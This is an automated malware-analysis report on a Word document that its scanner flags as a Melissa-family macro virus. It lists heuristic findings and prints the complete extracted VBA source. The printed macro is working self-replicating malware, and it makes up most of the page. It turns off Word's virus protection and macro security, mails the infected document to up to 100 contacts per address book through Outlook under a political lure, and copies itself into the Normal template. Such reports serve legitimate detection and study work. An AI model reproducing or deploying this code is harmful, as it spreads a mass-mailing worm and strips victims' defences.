MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Trojan.Melissa-23 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Melissa-23
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToI = ADI1 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject(h$) Set DasMapiName = UngaDasOutlook.GetNameSpace(j$) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() a$ = "" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://compagniedeslucioles.free.fr In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3420 bytes |
SHA-256: b37a513b6e6359703e4ff6262af1bc1a0f0d9ee1668846e3f4d5aed2c93c41e4 |
|||
|
Detection
ClamAV:
Doc.Trojan.Melissa-15
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "x"
Attribute VB_Base = "1Normal.x"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
a$ = ""
hk1$ = "HKEY_CURRENT_USER"
sec1$ = "Security"
smo$ = "\Software\Microsoft\Office"
b$ = hk1$ + smo$ + "\9.0\Word\" + sec1$
c$ = "Level"
d$ = sec1$ + "..."
e$ = "Macro"
g$ = "Tools"
ot1$ = "Outlook"
h$ = ot1$ + ".Application"
k$ = hk1$ + smo$ + "\"
nam$ = "x"
i$ = nam$ + "?"
aut$ = "y"
j$ = "MAPI"
l$ = "profile"
m$ = "password"
n$ = "Duhalde Presidente "
o$ = "Programa de gobierno 1999 - 2004."
p$ = hk1$ + smo$ + "\"
q$ = "Private Sub Document_Close()"
r$ = "Private Sub Document_Open()"
s$ = "Document"
t$ = " "
On Error Resume Next
If System.PrivateProfileString(a$, b$, c$) <> a$ Then
CommandBars(e$).Controls(d$).Enabled = False
System.PrivateProfileString(a$, b$, c$) = 1&
Else
CommandBars(g$).Controls(e$).Enabled = False
Options.ConfirmConversions = (3 - 3): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (3 - 3)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(h$)
Set DasMapiName = UngaDasOutlook.GetNameSpace(j$)
If System.PrivateProfileString(a$, k$, i$) <> aut$ Then
If UngaDasOutlook = ot1$ Then
DasMapiName.Logon l$, m$
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x1 = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x1)
BreakUmOffASlice.Recipients.Add Peep
x1 = x1 + 1
If x1 > 100 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = n$ & Application.UserName
BreakUmOffASlice.Body = o$
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = a$
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString(a$, p$, i$) = aut$
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> nam$ Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToI = ADI1
ADI1.Name = nam$
DoAD = True
End If
If NTI1.Name <> nam$ Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToI = NTI1
NTI1.Name = nam$
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = a$
ADI1.CodeModule.DeleteLines 1
Loop
ToI.CodeModule.AddFromString (q$)
Do While ADI1.CodeModule.Lines(BGN, 1) <> a$
ToI.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = a$
NTI1.CodeModule.DeleteLines 1
Loop
ToI.CodeModule.AddFromString (r$)
Do While NTI1.CodeModule.Lines(BGN, 1) <> a$
ToI.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, s$) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, s$) <> False) Then
ActiveDocument.Saved = True: End If
If (Day(Now) + 1) = (Minute(Now) + 2) Then Selection.TypeText t$
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.